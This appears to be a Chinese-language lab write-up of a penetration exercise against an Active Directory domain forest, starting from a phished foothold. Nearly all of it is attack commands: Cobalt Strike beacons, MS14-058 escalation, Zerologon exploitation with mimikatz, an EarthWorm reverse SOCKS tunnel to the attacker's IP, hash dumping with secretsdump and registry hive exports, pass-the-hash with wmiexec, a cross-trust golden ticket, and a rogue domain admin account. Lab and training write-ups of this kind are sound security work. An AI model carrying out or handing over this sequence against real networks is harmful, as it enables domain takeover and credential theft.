内网渗透：域森林实战

作者 小苏

模拟内网实战，以钓鱼已进入内网开始

cs生成exe上线web服务器

设置beacon响应时间为0

第一步:提权
利用ms14-058进行提权

提权成功

进行arp协议信息收集

作用：查看是否有多网卡

指令：

shell arp -a

查看主机信息

作用：可以看到有域，查看补丁进行对应的提权

指令：

shell systeminfo

收集网络全部信息

作用：可以看到主机名，域信息

指令：

shell ipconfig /all

利用nbtscan扫描

作用：扫出真实内网ip进行下一步渗透

进行mimikatz上传

作用：方便进一步内网渗透

扫描是否存在cve2020-1472

回应存在

指令:

lsadump::zerologon  /target:域控IP  /account:域控主机名$
shell mimikatz "lsadump::zerologon /target:10.10.3.6  /account:ziyu$" "exit"

上传ew进行代理

指令：

ew_for_Win.exe  -s rcsocks -l 1080 -e 888//将映射出的888端口返回到本地的1080端口

反向碰撞

原理：

我们攻击机开启了代理准备，也就是我们把888端口放到门口，谁指定我们的ip加这个端口碰撞便进行了代理连接

指令：

shell ew_for_Win.exe  -s rssocks -d 192.168.58.1（攻击机ip） -e 888

利用cve2020将域控密码置空

指令：

lsadump::zerologon  /target:域控IP  /account:域控主机名$  /exploit
shell mimikatz “lsadump::zerologon  /target:10.10.3.6  /account:ziyu$  /exploit” “exit”

kali设置代理，这里就是对应之前的代理设置，我们将888放到门口被撞，1080则为我们自己用

获取散列值

作用：制作票据，破解md5等等都可以，个人比较喜欢黄金票据

指令：

proxychains impacket-secretsdump -no-pass -just-dc xiyou.dayu.com/ZIYU\$@10.10.3.6

利用wmiexec连接

作用：连接域控制器了

指令：

proxychains python3 wmiexec.py -hashes :e35c2b2d95f6ae63b75dbbff5195accb ./Administrator@10.10.3.6

将sam system security.save文件先导出后下载下来,并清理痕迹

指令：

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save

获取散列值
作用：获得各用户hash以及还原域防止出现问题
指令：
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAl

进行还原
指令：
proxychains python3 reinstall_original_pw.py ZIYU 10.10.3.6 75df0c2187b6a79e46f26fa2fb16573aL

这个时候再用之前获取到的管理员hash登录域控

指令：

proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb xiyou.dayu.com/dayu@10.10.3.6

查看网卡信息，是否进攻正确

上线cs做中转，生成exe进行上线

kali直接上传上线

进行信息收集，这里21段机子未开

上传mimikatz利用信任关系制作票据进行攻击

先获取父子域sid

指令：

shell mimikatz “privilege::debug” “lsadump::lsa /patch /user:dayu$” “lsadump::trust /patch” “exit”

子域：S-1-5-21-4076297317-3311262154-314974380

父域：S-1-5-21-3309395417-4108617856-2168433834-519

krbtgt哈希值：c696e9337845d8ada46612d047e40209

进行黄金票据攻击

显示成功

指令：

shell “kerberos::golden /user:administrator /domain:xiyou.dayu.com /sid:S-1-5-21-4076297317-3311262154-314974380 /sids:S-1-5-21-3309395417-4108617856-2168433834-519 /krbtgt:c696e9337845d8ada46612d047e40209  /ptt” “exit”

但是这里是失败了

创建域管理员账号

直接通过3389进行黄金票据

终于也是成功了

接着利用wmiexec进行父域的访问

指令：

wmiexec.exe administrator:QWEasd123@10.10.3.5

上传2.exe进行运行上线cs

这一套直线内网流程就结束收工了